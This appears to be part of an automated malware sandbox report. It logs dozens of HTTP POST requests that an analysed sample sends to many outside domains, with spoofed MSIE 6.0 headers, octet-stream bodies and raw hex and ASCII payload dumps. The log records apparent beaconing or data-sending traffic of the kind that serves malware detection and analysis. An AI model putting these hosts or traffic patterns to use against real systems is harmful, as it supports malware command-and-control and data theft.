72 54 39 72 44 46 30 6a 72 57 72 51 49 2b 61 77 34 4b 2f 79 65 4d 49 5a 6c 47 56 77 2b 56 68 30 4b 7a 43 69 34 37 6e 6b 6c 75 79 45 53 6c 63 62 57 79 67 4e 4d 2f 46 67 43 71 35 55 77 47 33 78 79 46 51 68 30 41 48 6c 31 38 71 36 39 57 34 38 61 7a 49 6e 39 79 61 75 34 5a 68 69 45 67 37 65 66 31 49 52 33 74 75 5a 59 6c 45 35 74 6c 57 4a 39 75 62 32 31 62 6e 69 4a 31 47 65 63 41 2b 62 49 36 6b 35 63 6b 47 52 6e 5a 4b 68 2f 6b 76 6d 2b 73 6b 63 71 2b 37 6f 4c 4c 69 4c 4a 79 78 4f 6b 45 67 43 6b 47 31 76 67 4a 46 58 55 36 72 56 65 35 46 38 4d 2f 36 31 59 4f 78 37 7a 44 56 34 69 43 58 43 69 78 56 76 4c 35 39 4f 79 64 64 33 38 30 73 62 71 4d 38 76 36 72 6a 2f 58 58 70 38 39 4b 43 71 58 73 58 47 64 39 47 6e 62 6c 51 2f 6f 61 66 31 43 6d 50 45 34 53 70 47 57 61 46 56 30 52 51 4f 75 46 6a 4e 4b 48 64 36 49 71 7a 4e 6f 65 50 63 30 57 35 6b 57 38 61 50 4f 5a 57 68 52 34 6a 2b 38 57 33 72 42 4d 34 5a 75 59 43 6a 64 7a 30 32 56 4a 30 73 38 4b 74 68 65 66 55 4b 36 2b 68 51 30 4c 79 52 49 55 38 5a 59 77 6f 52 69 6f 35 46 69 6f 64 78 73 6a 54 6c 6f 43 34 38 79 4c 47 4a 52 68 33 42 6d 30 64 46 76 68 59 31 77 79 79 48 4d 75 61 77 49 36 6b 78 4c 46 2b 2b 68 5a 76 64 6b 43 59 3d Data Ascii: M5/74wz4LSXQv0vad1PFqR87ba7kpaowAAKB3szfLaYY+sIcwlYYvRcJL2xNE0oT9a2CRYJBPCK1zWE+EOHuJaMWL/6zqg35SdGtkbBgx6E6ncEk6Rs3sIkHnJAKNSVBVQKIukHjYUSurp8m154EBYsauyErO7GjoclIeb2FhkALr3H4uGNy4v9R4dEOrT9rDF0jrWrQI+aw4K/yeMIZlGVw+Vh0KzCi47nkluyESlcbWygNM/FgCq5UwG3xyFQh0AHl18q69W48azIn9yau4ZhiEg7ef1IR3tuZYlE5tlWJ9ub21bniJ1GecA+bI6k5ckGRnZKh/kvm+skcq+7oLLiLJyxOkEgCkG1vgJFXU6rVe5F8M/61YOx7zDV4iCXCixVvL59Oydd380sbqM8v6rj/XXp89KCqXsXGd9GnblQ/oaf1CmPE4SpGWaFV0RQOuFjNKHd6IqzNoePc0W5kW8aPOZWhR4j+8W3rBM4ZuYCjdz02VJ0s8KthefUK6+hQ0LyRIU8ZYwoRio5FiodxsjTloC48yLGJRh3Bm0dFvhY1wyyHMuawI6kxLF++hZvdkCY=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1665User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: bidroll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 86User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: reproar.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 70 30 38 48 51 59 68 72 30 38 48 51 5a 68 72 30 38 48 51 5a 69 73 31 39 49 52 61 69 73 31 41 49 52 62 6a 74 32 42 4a 53 62 6b 74 32 42 4a 53 62 6b 75 32 42 4b 54 62 6b 75 33 42 4b 54 63 6b 75 33 43 4c 55 64 6c 76 34 44 4c 55 64 6c 76 34 44 4e 57 66 70 78 36 Data Ascii: p08HQYhr08HQZhr08HQZis19IRais1AIRbjt2BJSbkt2BJSbku2BKTbku3BKTcku3CLUdlv4DLUdlv4DNWfpx6
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: calvinly.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 75 33 42 4a 52 59 67 70 77 34 43 4a 52 5a 67 70 78 35 43 4b 53 5a 68 71 78 35 44 4b 53 61 68 71 79 35 44 4c 53 61 69 72 79 36 45 4c 54 62 69 72 7a 36 45 4d 55 63 6a 73 30 37 46 4e 55 63 6b 74 30 39 47 4f 57 64 6c 75 31 39 48 4f 57 65 6c 75 32 41 48 50 58 65 6d 76 32 41 49 51 58 66 6f 76 33 42 4a 51 59 67 6f 77 34 42 4a 52 59 67 70 77 34 43 4a 52 5a 68 70 78 35 43 4b 53 5a 68 71 79 35 46 4e 55 63 6b 73 30 38 47 4f 56 64 6c 74 31 39 47 4f 57 65 6c 75 32 39 48 50 57 65 6d 75 32 41 48 50 58 65 6d 76 32 41 49 50 58 66 6f 76 33 42 49 51 59 67 6f 77 34 42 4a 52 59 67 70 78 34 43 4b 53 5a 68 71 78 35 44 4b 53 61 69 71 79 36 44 4c 54 61 69 72 7a 36 45 4d 54 62 6a 72 7a 37 46 4d 55 63 6a 73 30 37 46 4e 55 63 6b 73 30 38 47 4e 56 64 6c 74 31 39 47 4f 57 64 6c 75 32 39 48 50 58 65 6d 76 32 41 49 51 58 66 6f 76 33 42 49 51 59 66 6f 77 33 42 4a 51 59 67 6f 77 34 42 4a 52 5a 67 70 78 34 43 4b 52 5a 68 71 78 35 44 4b 53 61 68 71 79 35 44 4c 54 62 69 72 7a 36 45 4d 55 63 6a 73 30 37 46 4e 56 63 6b 74 30 38 47 4e 56 64 6b 74 31 39 48 4f 57 65 6c 75 32 39 48 50 58 65 6d 76 32 41 49 50 58 66 6d 76 33 41 49 51 58 66 6f 76 33 42 4a 51 59 67 6f 77 34 42 4a 52 5a 68 71 78 35 44 4b 53 61 68 71 79 35 44 4c 54 61 69 72 79 36 45 4c 54 62 6a 72 7a 37 45 4d 55 62 6a 73 30 37 46 4e 55 63 6b 74 30 38 47 4e 56 64 6c 74 31 39 48 4f 57 65 6c 75 32 39 48 50 57 66 6d 76 33 41 49 51 58 66 6f 77 34 42 4a 52 59 67 70 78 34 43 4b 52 5a 68 71 78 35 44 4b 53 61 68 71 79 35 44 4c 53 61 69 71 79 36 45 4c 54 62 69 72 7a 37 45 4d 55 62 6a 73 30 37 46 4e 55 63 6b 74 30 38 47 4f 56 64 6c 75 31 39 48 4f 57 65 6c 75 32 39 48 50 57 65 6d 76 32 41 49 50 58 66 6d 76 33 41 49 51 59 67 6f 77 34 42 4a 52 59 67 70 77 34 43 4b 52 5a 68 71 78 35 44 4b 53 61 68 71 79 36 44 4c 54 61 69 72 7a 36 45 4d 54 62 6a 73 7a 37 46 4d 55 63 Data Ascii: u3BJRYgpw4CJRZgpx5CKSZhqx5DKSahqy5DLSairy6ELTbirz6EMUcjs07FNUckt09GOWdlu19HOWelu2AHPXemv2AIQXfov3BJQYgow4BJRYgpw4CJRZhpx5CKSZhqy5FNUcks08GOVdlt19GOWelu29HPWemu2AHPXemv2AIPXfov3BIQYgow4BJRYgpx4CKSZhqx5DKSaiqy6DLTairz6EMTbjrz7FMUcjs07FNUcks08GNVdlt19GOWdlu29HPXemv2AIQXfov3BIQYfow3BJQYgow4BJRZgpx4CKRZhqx5DKSahqy5DLTbirz6EMUcjs07FNVckt08GNVdkt19HOWelu29HPXemv2AIPXfmv3AIQXfov3BJQYgow4BJRZhqx5DKSahqy5DLTairy6ELTbjrz7EMUbjs07FNUckt08GNVdlt19HOWelu29HPWfmv3AIQXfow4BJRYgpx4CKRZhqx5DKSahqy5DLSaiqy6ELTbirz7EMUbjs07FNUckt08GOVdlu19HOWelu29HPWemv2AIPXfmv3AIQYgow4BJRYgpw4CKRZhqx5DKSahqy6DLTairz6EMTbjsz7FMUc
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: hyab.seCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: metaforacom.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1940User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: acraloc.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: insia.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: coxkitchensandbaths.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1622User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: univi.itConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 780User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ssm.chConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 102User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: cutchie.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 73 32 42 4b 54 63 6c 76 34 43 4c 55 64 6d 77 34 44 4d 56 65 6f 78 35 45 4e 57 66 6f 78 36 46 4e 57 66 70 79 37 47 4f 59 67 71 7a 38 47 50 59 68 72 7a 38 49 51 5a 69 73 31 39 49 52 61 6a 74 31 41 4a 53 62 6b 74 32 42 4b 54 63 6b 75 33 43 4c 54 63 6c 76 34 44 4c 55 64 6d 79 37 47 4f 58 67 71 79 37 47 50 59 Data Ascii: s2BKTclv4CLUdmw4DMVeox5ENWfox6FNWfpy7GOYgqz8GPYhrz8IQZis19IRajt1AJSbkt2BKTcku3CLTclv4DLUdmy7GOXgqy7GPY
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: flamingorecordings.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: dhh.la.govCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1915User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: portoccd.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1593User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: shiner.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 508User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: vdoherty.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 33 48 55 69 32 46 50 5a 6a 75 37 4b 54 64 6f 7a 39 4b 56 66 71 30 41 4c 56 65 71 30 41 4c 56 66 71 32 43 4d 57 67 72 31 47 56 6a 7a 45 53 68 7a 45 54 6a 79 44 52 65 71 30 41 4b 55 65 72 31 42 4b 56 66 71 30 41 4b 56 65 70 30 41 4b 56 66 70 30 41 4b 54 64 72 31 42 4c 56 66 72 31 42 4c 55 66 71 30 42 4b 55 65 70 30 46 57 6b 30 46 53 65 73 34 47 51 61 6b 77 36 47 51 61 6b 76 36 46 50 61 6c 79 41 4d 58 6d 36 4c 59 6d 31 47 54 69 7a 42 4d 59 6d 32 48 58 6c 30 46 56 6b 7a 44 54 68 79 43 51 65 75 37 48 52 62 71 37 4f 64 73 37 4c 59 6c 7a 41 4d 59 6a 77 39 49 53 63 6d 78 37 48 52 65 70 7a 42 4d 57 68 72 31 43 4d 57 67 73 32 43 4c 56 66 71 31 41 4b 55 66 70 30 41 4b 54 66 73 34 47 52 64 71 32 45 50 63 75 38 4d 61 71 36 4c 62 74 33 44 4e 5a 70 35 4d 59 6b 79 41 4e 63 74 39 50 63 74 35 48 55 67 77 42 50 67 75 38 4e 63 71 32 44 51 65 75 39 4e 63 75 38 4d 61 71 35 4b 5a 71 37 4c 5a 70 35 4b 59 6f 31 46 55 6b 30 46 54 6a 30 44 50 5a 6a 75 35 48 56 6b 33 4b 62 70 32 44 4e 58 68 73 32 43 4e 57 68 73 32 43 4e 59 6a 75 34 44 4e 58 69 74 32 44 4e 58 69 73 33 43 4d 57 68 73 32 43 4e 58 67 73 33 46 53 64 72 33 46 51 63 70 30 43 4e 5a 6c 78 39 4c 58 69 76 37 4a 56 66 71 30 41 4b 55 65 70 30 41 4b 56 66 71 30 41 4b 56 66 70 7a 42 4c 56 66 72 30 41 4b 56 65 70 7a 42 4e 58 69 75 36 48 50 57 65 6d 76 32 41 49 50 58 66 6d 76 33 41 49 51 59 66 6f 77 33 44 4c 53 61 69 72 79 36 45 4c 54 62 69 72 79 36 45 4d 54 62 6a 72 7a 37 46 4d 55 63 6a 73 30 37 47 4f 57 65 6c 75 32 39 48 50 57 65 6d 76 32 41 49 50 59 66 6f 77 34 43 4a 53 61 Data Ascii: 3HUi2FPZju7KTdoz9KVfq0ALVeq0ALVfq2CMWgr1GVjzEShzETjyDReq0AKUer1BKVfq0AKVep0AKVfp0AKTdr1BLVfr1BLUfq0BKUep0FWk0FSes4GQakw6GQakv6FPalyAMXm6LYm1GTizBMYm2HXl0FVkzDThyCQeu7HRbq7Ods7LYlzAMYjw9IScmx7HRepzBMWhr1CMWgs2CLVfq1AKUfp0AKTfs4GRdq2EPcu8Maq6Lbt3DNZp5MYkyANct9Pct5HUgwBPgu8Ncq2DQeu9Ncu8Maq5KZq7LZp5KYo1FUk0FTj0DPZju5HVk3Kbp2DNXhs2CNWhs2CNYju4DNXit2DNXis3CMWhs2CNXgs3FSdr3FQcp0CNZlx9LXiv7JVfq0AKUep0AKVfq0AKVfpzBLVfr0AKVepzBNXiu6HPWemv2AIPXfmv3AIQYfow3DLSairy6ELTbiry6EMTbjrz7FMUcjs07GOWelu29HPWemv2AIPYfow4CJSa
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 566User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: fifa-ews.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 45 4f 57 65 6c 75 32 41 49 51 58 66 6f 77 33 42 4a 52 5a 68 70 78 35 44 4b 53 61 69 71 79 36 45 4c 54 62 6a 73 7a 37 46 4e 56 63 6b 74 31 39 47 4f 57 65 6d 75 32 41 49 51 59 66 6f 77 34 42 4a 52 5a 68 71 78 35 44 4c 53 61 69 71 79 36 45 4c 54 62 6a 72 7a 37 46 4d 55 63 6b 74 30 38 47 4e 56 64 6b 74 31 39 48 4f 57 65 6d 75 32 41 49 50 58 66 6d 76 33 42 49 51 59 67 6f 77 34 42 4a 52 5a 68 71 79 36 45 4c 54 62 69 72 7a 37 45 4d 55 63 6a 73 30 38 46 4e 56 63 6b 74 31 38 47 4f 56 64 6c 74 31 39 48 4f 57 65 6c 75 32 39 48 50 58 65 6d 76 33 41 49 51 58 66 6f 77 33 42 4a 51 59 67 71 79 35 44 4c 53 61 69 71 79 36 45 4c 54 62 69 72 7a 36 45 4d 55 63 6a 73 30 37 46 4e 56 63 6b 74 30 38 47 4e 56 64 6b 74 31 38 47 4f 56 64 6c 74 31 39 47 4f 57 65 6c 75 32 39 48 50 57 65 6d 76 33 41 49 51 59 66 6f 77 33 42 4a 51 59 67 70 78 34 43 4b 52 5a 68 70 78 35 43 4b 53 5a 68 71 79 35 44 4c 53 61 69 72 79 36 45 4d 54 62 6a 72 7a 37 45 4d 55 62 6a 73 30 37 46 4e 55 63 6b 73 30 38 46 4f 56 64 6c 74 31 39 48 4f 57 65 6d 75 32 41 49 50 58 66 6d 76 33 41 49 51 59 66 6f 77 34 42 4a 52 59 67 70 78 34 43 4b 53 5a 68 71 78 35 44 4c 53 61 69 72 79 36 45 4d 54 62 6a 73 30 38 46 4e 56 63 6b 74 30 38 47 4f 56 64 6c 75 31 39 48 4f 57 65 6c 75 32 39 48 50 58 65 6d 76 32 41 49 51 58 66 6f 76 33 42 4a 51 59 67 70 77 34 43 4a 52 5a 67 70 78 35 43 4b 53 61 68 71 79 36 45 4c 54 62 6a 72 7a 37 45 4d 55 63 6a 73 30 37 46 4e 55 63 6b 74 30 38 47 4e 56 64 6b 74 31 39 47 4f 57 64 6c 74 31 39 47 4f 57 65 6c 75 32 41 48 50 58 66 6d 76 33 41 49 51 59 66 6f 77 34 43 4b 52 5a 68 71 78 35 44 4b 53 61 68 71 79 35 44 4c 53 61 69 72 7a 36 45 57 65 6d 76 33 41 49 51 58 66 6f 77 33 42 4a 51 59 67 70 78 34 43 4b 53 5a 68 71 78 35 Data Ascii: EOWelu2AIQXfow3BJRZhpx5DKSaiqy6ELTbjsz7FNVckt19GOWemu2AIQYfow4BJRZhqx5DLSaiqy6ELTbjrz7FMUckt08GNVdkt19HOWemu2AIPXfmv3BIQYgow4BJRZhqy6ELTbirz7EMUcjs08FNVckt18GOVdlt19HOWelu29HPXemv3AIQXfow3BJQYgqy5DLSaiqy6ELTbirz6EMUcjs07FNVckt08GNVdkt18GOVdlt19GOWelu29HPWemv3AIQYfow3BJQYgpx4CKRZhpx5CKSZhqy5DLSairy6EMTbjrz7EMUbjs07FNUcks08FOVdlt19HOWemu2AIPXfmv3AIQYfow4BJRYgpx4CKSZhqx5DLSairy6EMTbjs08FNVckt08GOVdlu19HOWelu29HPXemv2AIQXfov3BJQYgpw4CJRZgpx5CKSahqy6ELTbjrz7EMUcjs07FNUckt08GNVdkt19GOWdlt19GOWelu2AHPXfmv3AIQYfow4CKRZhqx5DKSahqy5DLSairz6EWemv3AIQXfow3BJQYgpx4CKSZhqx5
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 66 59 62 53 43 6e 62 75 71 79 57 47 4c 32 65 6f 30 52 4f 7a 38 42 6e 2f 55 72 4f 57 4e 64 55 66 43 6e 70 4e 41 61 4c 2f 2b 6e 2b 43 37 39 4f 73 58 4a 45 59 48 53 6c 32 2b 32 55 70 72 55 58 2f 39 57 33 31 65 51 78 39 41 6b 66 47 77 43 76 79 55 79 68 56 46 62 64 65 45 65 7a 73 34 68 78 77 73 68 73 52 6b 35 35 72 58 53 75 64 67 33 2b 44 6e 6a 51 4c 54 69 69 6e 4b 6d 52 7a 45 57 55 6a 74 46 55 4b 52 41 46 6a 54 53 44 61 46 70 72 5a 58 6e 71 37 2f 61 54 34 56 61 78 66 7a 44 64 70 58 57 62 6d 48 2b 61 52 4e 71 48 48 79 55 72 4a 35 64 43 74 35 6b 47 30 70 57 4b 31 30 73 67 6c 72 51 56 72 65 4c 54 36 38 4c 42 50 54 52 2f 66 6b 63 6a 6c 6d 48 37 30 61 54 4f 77 34 5a 52 35 33 34 53 36 31 42 47 32 39 44 65 32 66 6e 79 75 55 30 68 34 59 38 6e 6c 54 31 75 75 65 64 4a 6b 79 56 67 62 4f 6f 43 2f 69 43 6e 2b 4e 37 44 48 47 2b 39 61 64 2f 63 2b 51 65 6c 57 32 68 67 7a 31 55 6e 41 6f 62 51 76 33 55 51 2b 53 46 4c 32 31 78 61 34 52 75 2b 6f 2b 41 52 38 33 38 4a 64 70 63 50 78 66 64 52 59 4c 30 7a 6a 52 2b 45 39 65 44 59 6f 33 4a 70 61 74 67 7a 4a 75 2f 4f 55 32 54 72 36 77 53 7a 76 45 6d 38 42 72 6b 41 67 74 6c 54 78 6c 74 6b 55 72 33 79 67 44 59 45 58 64 4b 36 36 55 59 35 4a 52 6c 37 79 38 75 35 4e 42 2b 4a 39 38 61 38 75 71 4a 6b 73 75 43 4a 61 4c 48 4c 78 76 6d 6e 79 42 35 4a 74 69 30 44 45 39 56 32 45 66 36 32 6c 44 71 52 4a 53 33 34 41 67 39 77 2f 54 49 51 5a 64 4d 69 64 56 77 50 78 4b 51 34 59 46 4e 4e 43 32 34 67 34 6a 7a 6b 44 74 37 58 38 57 47 49 4d 37 70 43 6a 4b 6e 61 78 68 5a 6b 43 46 62 41 44 4d 54 54 4b 4e 4a 44 48 78 5a 65 59 63 52 75 43 58 4b 66 4d Data Ascii: fYbSCnbuqyWGL2eo0ROz8Bn/UrOWNdUfCnpNAaL/+n+C79OsXJEYHSl2+2UprUX/9W31eQx9AkfGwCvyUyhVFbdeEezs4hxwshsRk55rXSudg3+DnjQLTiinKmRzEWUjtFUKRAFjTSDaFprZXnq7/aT4VaxfzDdpXWbmH+aRNqHHyUrJ5dCt5kG0pWK10sglrQVreLT68LBPTR/fkcjlmH70aTOw4ZR534S61BG29De2fnyuU0h4Y8nlT1uuedJkyVgbOoC/iCn+N7DHG+9ad/c+QelW2hgz1UnAobQv3UQ+SFL21xa4Ru+o+AR838JdpcPxfdRYL0zjR+E9eDYo3JpatgzJu/OU2Tr6wSzvEm8BrkAgtlTxltkUr3ygDYEXdK66UY5JRl7y8u5NB+J98a8uqJksuCJaLHLxvmnyB5Jti0DE9V2Ef62lDqRJS34Ag9w/TIQZdMidVwPxKQ4YFNNC24g4jzkDt7X8WGIM7pCjKnaxhZkCFbADMTTKNJDHxZeYcRuCXKfM
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 87User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: canasil.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 72 33 42 4b 54 63 6c 76 34 44 4d 56 65 6f 77 37 46 4f 58 67 71 79 37 47 51 5a 68 72 32 42 4b 55 64 6d 77 34 44 4d 32 4a 53 62 6b 75 32 42 4b 54 63 6c 76 35 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 49 51 61 6a 74 32 42 4b 53 62 6b 75 33 42 4b 54 63 6c 76 34 43 Data Ascii: r3BKTclv4DMVeow7FOXgqy7GQZhr2BKUdmw4DM2JSbku2BKTclv5DMVeox6FOXgqz8IQajt2BKSbku3BKTclv4C
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: magicomm.co.ukCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 907User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ifesnet.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 128User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: tbvlugus.nlConnection: Keep-AliveCache-Control: no-cacheData Raw: 41 4b 53 61 69 72 7a 37 46 4e 56 64 6b 74 31 39 48 50 58 66 6f 77 34 42 4a 52 5a 68 71 79 36 45 4c 54 62 6a 73 30 38 47 4f 57 65 6c 75 32 41 49 51 59 67 70 78 35 44 4c 53 61 69 72 7a 37 46 4e 55 64 6c 75 32 41 49 50 58 66 6f 77 34 43 4b 53 61 68 71 79 36 45 4d 55 63 6b 74 30 38 47 55 64 70 7a 41 4a 52 5a 68 76 37 4b 54 64 6d 76 33 42 4d 59 6b 77 36 46 4e 56 66 72 37 48 51 5a 68 71 Data Ascii: AKSairz7FNVdkt19HPXfow4BJRZhqy6ELTbjs08GOWelu2AIQYgpx5DLSairz7FNUdlu2AIPXfow4CKSahqy6EMUckt08GUdpzAJRZhv7KTdmv3BMYkw6FNVfr7HQZhq
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1804User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: shittas.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ramkome.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: impexnc.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: scip.org.ukConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 261User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: hes.ptConnection: Keep-AliveCache-Control: no-cacheData Raw: 37 69 31 49 63 76 48 57 70 41 5a 73 45 57 74 42 55 71 37 52 6d 33 4e 68 33 4d 64 76 46 62 76 45 59 73 42 55 70 35 51 6a 35 50 67 31 4e 67 77 49 63 76 47 63 76 45 57 72 41 53 6d 38 4d 66 31 4e 68 32 4b 65 31 4c 63 75 44 57 72 37 55 6d 36 51 66 31 4d 67 7a 4b 62 77 46 61 77 44 58 72 41 57 72 39 54 6d 36 51 70 56 71 37 55 70 38 4f 69 35 54 70 41 51 69 33 4e 69 31 4b 62 78 38 48 51 5a 69 74 32 42 4d 56 65 6f 78 36 46 50 59 68 72 30 39 49 52 61 6a 74 32 43 4c 55 64 6d 7a 39 6a 75 33 43 4d 56 65 6f 78 37 4b 54 64 6d 78 36 46 50 59 68 72 30 39 49 52 61 6d 77 37 47 50 5a 69 73 31 42 4a 53 63 6c 76 33 43 4c 57 66 71 7a 38 48 51 61 6a 74 32 42 4b 54 65 71 31 42 4b 54 63 6c 75 37 49 53 62 6b 75 33 43 4c 55 64 6f 78 36 46 4e 57 66 70 79 37 47 51 5a 69 73 31 39 4a 53 62 6b 75 33 47 51 Data Ascii: 7i1IcvHWpAZsEWtBUq7Rm3Nh3MdvFbvEYsBUp5Qj5Pg1NgwIcvGcvEWrASm8Mf1Nh2Ke1LcuDWr7Um6Qf1MgzKbwFawDXrAWr9Tm6QpVq7Up8Oi5TpAQi3Ni1Kbx8HQZit2BMVeox6FPYhr09IRajt2CLUdmz9ju3CMVeox7KTdmx6FPYhr09IRamw7GPZis1BJSclv3CLWfqz8HQajt2BKTeq1BKTclu7ISbku3CLUdox6FNWfpy7GQZis19JSbku3GQ
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 925User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: rappich.deConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 607User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: orbitgas.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6f 79 37 47 50 59 68 72 30 39 49 52 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 51 63 6d 77 35 45 4e 57 66 70 79 37 47 50 59 69 73 31 41 4a 53 62 6b 75 34 44 4d 56 65 6f 78 36 46 4f 58 68 72 30 39 49 53 63 6d 77 35 45 4e 57 66 70 79 38 48 51 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 72 30 39 49 52 61 6a 74 32 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 5a 69 73 31 41 4a 53 62 6b 75 33 45 4f 58 68 72 30 